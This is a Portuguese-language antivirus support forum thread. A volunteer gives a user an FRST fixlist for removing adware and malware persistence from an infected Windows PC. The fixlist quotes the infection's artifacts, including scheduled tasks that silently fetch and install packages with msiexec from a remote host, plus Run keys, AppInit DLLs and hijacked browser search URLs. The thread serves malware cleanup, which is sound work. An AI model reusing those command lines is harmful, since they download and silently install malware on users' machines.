Conexão Bloqueada Avast

system · October 15, 2018, 7:36pm

Olá, durante a utilização normal do meu PC, mesmo não estando a utilizar qualquer navegador, aparece-me uma mensagem dizendo:

Abortamos a conexão em reserved-18:09 com segurança, pois ela foi infectada com URL: Mal.

Já segui os passos indicados por jefferson sant em: https://forum.avast.com/index.php?topic=222111.0

Com isso, segue em anexo os logs fornecidos após utilizar a ferramenta FRST

Obrigado desde já!

system · October 15, 2018, 8:13pm

Segue screenshot do ocorrido.

jeffersonsant · October 16, 2018, 2:14am

Boa noite PauloEduJr.

Você será encaminhado para o especialista em remoção de malware.
Aguarde enquanto ele irá checar os logs e preparar a correção necessária para seu sistema.

SassDrake · October 16, 2018, 7:20pm

Open Notepad (click Start button → type notepad.exe → press Enter)
Copy text from code block below and paste it into Notepad

Start

HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [OFX2MHJ73DG0V1P] => "C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [5NKCD3T568NOTBX] => "C:\Program Files (x86)\avdy4xd255s\IT2WO.exe"
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\...\Run: [TD06HHFP5CTIKRU] => "C:\Program Files\MARAE1CS4W\MARAE1CS4.exe"
AppInit_DLLs: C:\ProgramData\Kolnixo\Latdontex.dll => Nenhum Arquivo
AppInit_DLLs-x32: C:\ProgramData\Kolnixo\Unazoocore.dll => Nenhum Arquivo
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
HKU\S-1-5-21-3827494730-315343196-2291642818-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqRiJPeLR9xpZw-YCRDaqHUNFn4VvdPoH3kThd5Pb-DfTeDFWC3jmZ1uTs96rKYaW-FFJwcupTKq-GkE7JtUIUQmlM,
SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
SearchScopes: HKU\S-1-5-21-3827494730-315343196-2291642818-1001 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBLoO-BhLymRVyoiO2t6mfQOs8M5OH4pNp6eRJDJkl1N_EQfTv4f0rjOczo32Xtz3N-27pUJK0PO-diJHRoSXf5bdW2FI2OIzOXXhqdKPlSwWb8CKIjyo-c0fgE_8ZYmppJqT_Oif-BWEhkaspvFCfftu3EN8Tl63EKk9_xasBgM8oTBrbuPGW8RfP1fM8,&q={searchTerms}
FF ProfilePath: C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default [2018-10-08]
FF user.js: detected! => C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\user.js [2017-06-30]
FF Homepage: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.HP
FF NewTab: Mozilla\Firefox\Profiles\h1uvz66m.default -> file:///C:/ProgramData/Kolnixos/ff.NT
FF Extension: (System Table) - C:\Users\Larissa\AppData\Roaming\Mozilla\Firefox\Profiles\h1uvz66m.default\Extensions\383882@modext.tech.xpi [2018-08-22]
FF ExtraCheck: C:\Program Files\mozilla firefox\defaults\pref\secure_cert.js [2018-09-17] <==== ATENÇÃO
CHR NewTab: Default ->  Not-active:"chrome-extension://pbdpajcdgknpendpmecafmopknefafha/index.html"
Task: {175C0283-03A8-4588-AE0A-D2A13688C342} - System32\Tasks\{D9CB0165-AADE-AFE6-309A-89FFBC6068FA} => C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
Task: {340341A9-02B5-4732-B1BE-E95FA8B555B5} - System32\Tasks\{977FC540-862A-1485-BE8E-EBE713CA2632} => "msiexec.exe" /i hxxp://reserved-1809.info/wqinlpdbtyiae.iim /q
Task: {ABA50C80-93BA-47D7-9B71-E787F5DAE34E} - System32\Tasks\{51429B8F-1957-2A2F-F8F9-19D260D02656} => C:\Program Files (x86)\EdEyamlne.exe <==== ATENÇÃO
Task: {DA8F3809-E003-4362-A9E6-336B51F17E3C} - System32\Tasks\{35F07B8B-E8E3-128A-9CD2-641985BE45E2} => "msiexec.exe" /q /i hxxp://reserved-1809.info/ieokzkigppaxj.avg
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Larissa\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
VirusTotal: C:\Program Files\Z2TPWW63HD\Z2TPWW63H.exe;C:\Program Files (x86)\avdy4xd255s\IT2WO.exe;C:\Program Files\MARAE1CS4W\MARAE1CS4.exe;C:\Windows\SysWOW64\yEiCoYMHMkAII.exe;
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\ProgramData\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxlctlfudivq`qsp`29hfm [0]
AlternateDataStreams: C:\Users\Todos os Usuários\Reprise:wupeogjxldtlfudivq`qsp`27hfm [0]
C:\Users\Larissa\AppData\Roaming\if1c3d5ltac
C:\Users\Larissa\AppData\Roaming\3a3uavskp25
C:\Program Files\Z2TPWW63HD
C:\Program Files (x86)\avdy4xd255s
C:\Program Files\MARAE1CS4W
C:\ProgramData\Kolnixo
C:\ProgramData\Kolnixos
C:\Windows\SysWOW64\yEiCoYMHMkAII.exe
C:\Program Files (x86)\EdEyamlne.exe
2018-09-17 14:51 - 2018-09-17 14:51 - 007784960 _____ () C:\Users\Larissa\AppData\Local\agent.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000070896 _____ () C:\Users\Larissa\AppData\Local\Config.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 002020245 _____ () C:\Users\Larissa\AppData\Local\Dentodex.tst
2018-09-17 14:50 - 2018-09-17 14:50 - 000017664 _____ () C:\Users\Larissa\AppData\Local\InstallationConfiguration.xml
2018-09-17 14:50 - 2018-09-17 14:50 - 000140800 _____ () C:\Users\Larissa\AppData\Local\installer.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000018432 _____ () C:\Users\Larissa\AppData\Local\Main.dat
2018-09-17 14:51 - 2018-09-17 14:51 - 000005568 _____ () C:\Users\Larissa\AppData\Local\md.xml
2018-09-17 14:51 - 2018-09-17 14:51 - 000126464 _____ () C:\Users\Larissa\AppData\Local\noah.dat
2018-09-17 14:50 - 2018-09-17 14:50 - 001413120 _____ () C:\Users\Larissa\AppData\Local\sham.db
2018-09-17 14:51 - 2018-09-17 14:51 - 000032038 _____ () C:\Users\Larissa\AppData\Local\uninstall_temp.ico
2018-09-17 14:51 - 2018-09-17 14:51 - 000000003 _____ () C:\Users\Larissa\AppData\Local\wbem.ini
EmptyTemp:

End

Go to File → Save As
Make sure that UTF-8 is selected as Encoding (left side of Save button)
Save it as fixlist.txt on Desktop
Open again FRST and click on button Fix
Wait until FRST finishes
fixlog.txt should be genereted and opened. Attach it your post and wait further instructions.

system · October 17, 2018, 11:28am

Segue fixlog.

jeffersonsant · October 19, 2018, 2:19am

Encaminhei a Sass Drake. O log é verificado amanhã.

SassDrake · October 19, 2018, 6:50pm

What is system status now?

Conexão Bloqueada Avast

Announcements